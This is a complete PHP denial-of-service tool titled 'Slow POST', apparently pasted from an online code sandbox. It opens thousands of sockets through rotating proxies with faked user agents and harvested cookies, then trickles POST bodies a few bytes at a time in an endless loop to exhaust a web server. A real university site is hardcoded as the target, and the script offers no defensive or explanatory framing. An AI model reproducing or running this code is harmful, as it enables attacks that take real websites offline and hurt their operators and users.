<?php
set_time_limit(0);
ignore_user_abort(true);
$_SERVER['argv'][1] = 'http://www.estesl.ipl.pt/procurar/%rand%';
//-------------------------
// CONFiG
//-------------------------
$CONFIG['max_cookies'] = 20;
$CONFIG['max_sockets'] = 9001;
$CONFIG['timeout_ms'] = 500;
$CONFIG['usleep_time'] = 10;
//-------------------------
// INiT
//-------------------------
// Check SAPI
if(PHP_SAPI != 'cli') { exitWithError('This script is not meant to be ran via browser.'); }
// Check PHP Version
if(version_compare(PHP_VERSION, '5.0.4') < 0) { exitWithError('This script only supports PHP 5.0.4 and higher.'); }
// Define exploit version
if(!defined('EXPLOIT_VERSION')) { define('EXPLOIT_VERSION', 'v3.0.3'); }
// Define input stream
if(!defined('STDIN')) { define('STDIN', fopen('php://stdin', 'r')); }
// Globals - DO NOT EDIT
$global_proxy_array = array();
//-------------------------
// FUNCTIONS
//-------------------------
/** Read STDIN and return it */
function readSTDIN($message) {
echo PHP_EOL.$message.' : ';
return trim(fgets(STDIN));
}
/** Exit with error message */
function exitWithError($message) {
echo '[ERROR] '.$message;
exit(1);
}
/** Receive a filename that has proxies listed in it and fills the $global_proxy_array */
function proxyLoadFile($filename) {
global $global_proxy_array;
// Load proxy list file
$filename = str_replace('\\', '/', $filename);
$content = @file_get_contents($filename);
if(!$content) { exitWithError($filename.' is not a valid proxy-list file!'); }
$content = str_replace(array("\r\n", "\r"), "\n", $content);
$content = explode("\n", $content);
// Grab the proxies
foreach($content as $value) {
$tmp = explode(':', $value);
if(isset($tmp[0], $tmp[1])) {
$tmp[0] = trim($tmp[0]);
$tmp[1] = (int)(trim($tmp[1]));
$global_proxy_array[] = array('host' => $tmp[0], 'port' => $tmp[1]);
}
}
}
/** Returns a random a proxy */
function proxyGetRandom() {
global $global_proxy_array;
$proxy = false;
if(count($global_proxy_array)) {
while(!$proxy) {
$rand = mt_rand(0, count($global_proxy_array) - 1);
$proxy = (isset($global_proxy_array[$rand]) ? $global_proxy_array[$rand] : null);
}
}
return $proxy;
}
/** Returns a random useragent */
function randomUserAgent() {
// Random Windows version
$os = array('5.1', '5.2', '6.0', '6.1', '6.2');
$os = $os[mt_rand(0, count($os) - 1)];
// Select a random browser
if(mt_rand(0, 1)) {
// Random Internet Explorer version
$ua[0] = array('4.0', '8.0', '4.0');
$ua[1] = array('5.0', '9.0', '5.0');
$ua[2] = array('5.0', '10.0', '6.0');
$ua = $ua[mt_rand(0, count($ua) - 1)];
return "Mozilla/{$ua[0]} (compatible; MSIE {$ua[1]}; Windows NT {$os}; Trident/{$ua[2]})";
} else {
// Random Mozilla Firefox version
$ua = mt_rand(17, 21);
return "Mozilla/5.0 (Windows NT {$os}; rv:{$ua}.0) Gecko/20100101 Firefox/{$ua}.0";
}
}
/** Build stream context or header for connection */
function buildStreamContext($newEraUrl, $newEraProxy, $method='GET', $length='0', $cookie='', $just_header=false)
{
// Proxy support
$proxy = $newEraProxy ? $newEraProxy->full_url : '';
$fulluri = ($newEraProxy && !$newEraUrl->ssl) ? true : false;
// Prepare for header build
$header = '';
// When we return header, set the GET/POST line
if($just_header)
$header .= $method.' '.($fulluri ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
// Continue building the header
$header .= 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
$header .= 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
if($method == 'POST') {
$header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
$header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
$header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
$header .= "Content-Length: {$length}\r\n";
}
// When we return header, return it with an extra EOL for termination
if($just_header)
return $header."\r\n";
// Build stream context
$context = stream_context_create(array(
'http' => array(
'method' => $method,
'timeout' => (2),
'header' => $header,
'proxy' => $proxy,
'request_fulluri' => $fulluri,
'max_redirects' => (0),
'protocol_version' => (1.1),
'ignore_errors' => true
),
'ssl' => array(
'verify_peer' => false
)));
return $context;
}
/** Start slowPost */
function slowPostStart($newEraUrl, $newEraProxy, $cookie) {
global $CONFIG;
$obj = ($newEraProxy ? $newEraProxy : $newEraUrl);
$host = ($obj->ssl ? 'ssl://' : 'tcp://').$obj->name;
// Connect
if($socket = @fsockopen($host, $obj->port, $errno, $errstr, 2)) {
// Generate random Content-Length
$length = mt_rand(1337, 133700);
if($newEraProxy && $newEraUrl->ssl) {
// We must enable crypto when using a proxy and url with ssl
$header = 'CONNECT '.$newEraUrl->name.':'.$newEraUrl->port."\r\n";
$header .= 'Host: '.$newEraUrl->name.':'.$newEraUrl->port."\r\n";
$header .= 'Proxy-Connection: Keep-Alive'."\r\n\r\n";
@fwrite($socket, $header);
do { $s = trim(@fread($socket, 8192)); } while($s);
@stream_socket_enable_crypto($socket, true, STREAM_CRYPTO_METHOD_SSLv3_CLIENT);
}
// Send header
if(@fwrite($socket, buildStreamContext($newEraUrl, $newEraProxy, 'POST', $length, $cookie, true))) {
// Set the socket to be asynchronous
stream_set_blocking($socket, 0);
stream_set_timeout($socket, 0, $CONFIG['timeout_ms']);
// Return socket and the length remaining
return array('socket' => $socket, 'length' => $length);
}
}
return false;
}
/** Continue slowPost */
function slowPostContinue($socket, $bytes = 5) {
global $CONFIG;
// Check socket
if(!$socket)
return false;
// Check bytes
if(intval($bytes) != $bytes)
$bytes = 5;
// Throttle execution speed slightly
if($CONFIG['usleep_time'] > 0)
@usleep($CONFIG['usleep_time']);
// Do it
$tmp = '';
for($j = 0; $j < $bytes; $j++)
$tmp .= chr(mt_rand(ord('a'), ord('z')));
return @fwrite($socket, $tmp);
}
//-------------------------
// CLASSES
//-------------------------
/** I want cookies! Give me cookies! */
class NewEraCookies {
private $max_cookies;
private $cookies = array();
/** Constructor */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/** Object updater */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i = 0; $i < $this->max_cookies; $i++) {
// Using Proxy file?
if($proxyFile) {
$newproxy = proxyGetRandom();
if(!$newproxy) { exitWithError($proxyFile.' is not a valid proxy-list file!'); }
$newEraProxy->update_object($newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
if($output)
echo '.';
}
}
/** Returns a cookie by its index */
public function returnCookieByIndex($idx) {
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies - 1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/** Function to parse set-cookie from header fields */
public static function cookieParse($header) {
$cookies = array();
foreach($header as $line) {
if(preg_match('/^Set-Cookie: /i', $line)) {
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$grabbed_cookie_data = false;
foreach($csplit as $data) {
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
if(!$grabbed_cookie_data) {
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$grabbed_cookie_data = true;
continue;
}
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) {
$cdata[$cinfo[0]] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/** Function to build the request cookie header from parsed set-cookie data */
public static function cookieBuild($data) {
if(is_array($data)) {
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/** Function to grab cookies from an url using PHP's fopen */
public static function cookieGrab($newEraUrl, $newEraProxy = null) {
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, buildStreamContext($newEraUrl, $newEraProxy, 'GET'));
// I hope this does work
if($handle) {
// Grab the cookies
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
@fclose($handle);
}
return $cookie;
}
}
/** Class to construct and handle an url-like object */
class NewEraUrl {
private $host_full_url;
private $host_protocol;
private $host_ssl;
private $host_name;
private $host_port;
private $host_path;
/** Constructor */
public function __construct($url) {
$this->update_object($url);
}
/** Object updater */
public function update_object($url) {
$this->host_full_url = $url;
// URL: SSL and protocol
$this->host_ssl = (strpos($url, 'https') === 0) ? true : false;
$this->host_protocol = ($this->host_ssl ? 'https' : 'http');
$url = explode('/', $url, 4);
$url[2] = explode(':', $url[2], 2);
// URL: Name, port and path
$this->host_name = $url[2][0];
$this->host_port = (isset($url[2][1]) ? $url[2][1] : ($this->host_ssl ? 443 : 80));
$this->host_path = '/'.(isset($url[3]) ? $url[3] : '');
}
/** Getter for the private properties */
public function __get($var) {
$var = 'host_'.$var;
if(isset($this->{$var}))
{
// Random support
$str = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$str = substr(str_shuffle($str), 0, 8);
// Return string with random generated content
return str_replace('%rand%', $str, $this->{$var});
}
}
/** Quick check to see if url is minimally valid */
public static function isValid($url) {
if(strpos($url, 'https://') === 0) {
if(!extension_loaded('openssl')) { exitWithError('OpenSSL extension is not loaded - Unable to access HTTPS URL'); }
return true;
} else if(strpos($url, 'http://') === 0) {
return true;
}
return false;
}
}
/** Class to construct and handle a proxy-like object */
class NewEraProxy {
private $proxy_full_url;
private $proxy_name;
private $proxy_port;
/** Constructor */
public function __construct($url) {
$this->update_object($url);
}
/** Object updater */
public function update_object($url) {
if(FALSE !== ($tmp = strpos($url, '://')))
{
$tmp += 3;
$url = substr($url, $tmp);
}
$url = explode(':', $url);
// Proxy: Name, port and full URL
$this->proxy_name = $url[0];
$this->proxy_port = (int)(isset($url[1]) ? $url[1] : '8080');
$this->proxy_full_url = 'tcp://'.$this->proxy_name.':'.$this->proxy_port;
}
/** Getter for the private properties */
public function __get($var) {
$var = 'proxy_'.$var;
if(isset($this->{$var}))
return $this->{$var};
}
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack
$url = null;
if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]))
$url = $_SERVER['argv'][1];
// Fetch proxy to use
$proxy = array();
if(!empty($url) && isset($_SERVER['argv'][2])) {
if($proxy = explode(':', $_SERVER['argv'][2])) {
if(isset($proxy[0], $proxy[1])) {
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = (int)($proxy[1]);
unset($proxy[0], $proxy[1]);
}
}
if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) {
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy
if((empty($proxy['host']) || empty($proxy['port'])) && empty($url) && empty($proxy['file'])) {
do {
switch($tmp = substr(strtolower(readSTDIN('Do you want to use a proxy [yes/no/file]')), 0, 1)) {
case 'n':
break;
case 'y':
$proxy['host'] = readSTDIN('Proxy IP');
$proxy['port'] = (int)(readSTDIN('Proxy port'));
break;
case 'f':
$proxy['filename'] = readSTDIN('Proxy file');
if(is_readable($proxy['filename'])) {
$proxy['file'] = true;
} else {
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$tmp = null;
}
break;
default:
$tmp = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
break;
}
} while(!$tmp);
}
// Ask for target URL
while(!$url) {
$url = readSTDIN('Target url');
if(NewEraUrl::isValid($url)) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy support
if(empty($proxy['host']) || empty($proxy['port'])) {
$newEraProxy = null;
if(!empty($proxy['file'])) {
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy) { exitWithError($proxy['filename'].' is not a valid proxy-list file!'); }
$newEraProxy = new NewEraProxy($newproxy['host'].':'.$newproxy['port']);
}
} else {
$newEraProxy = new NewEraProxy($proxy['host'].':'.$proxy['port']);
}
// Init the others
$newEraUrl = new NewEraUrl($url);
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], @$proxy['file'], true);
// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
$fp = array();
// Do it
while(1) {
for($i = 0; $i < $CONFIG['max_sockets']; $i++) {
// Using Proxy file?
if(!empty($proxy['file'])) {
$newproxy = proxyGetRandom();
if(!$newproxy) { exitWithError($proxy['filename'].' is not a valid proxy-list file!'); }
$newEraProxy->update_object($newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket
if($tmp = slowPostStart($newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) {
// Progress bar
echo '.';
if(isset($fp[$i], $fp[$i]['socket'])) {
// Close connection in the global socket array if it's being used
@fclose($fp[$i]['socket']);
unset($fp[$i]);
}
// Save the new socket in the global socket array
$fp[$i] = $tmp;
}
// Check the current slowPosts
foreach($fp as $k => $v) {
if($fp[$k]['socket'] && ($fp[$k]['length'] > 0)) {
// Contine current
$tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5;
slowPostContinue($fp[$k]['socket'], $tmp);
$fp[$k]['length'] -= $tmp;
} else {
// Close completed
@fclose($fp[$k]['socket']);
unset($fp[$k]);
}
}
}
}
?>
preferences:
49.69 ms | 402 KiB | 5 Q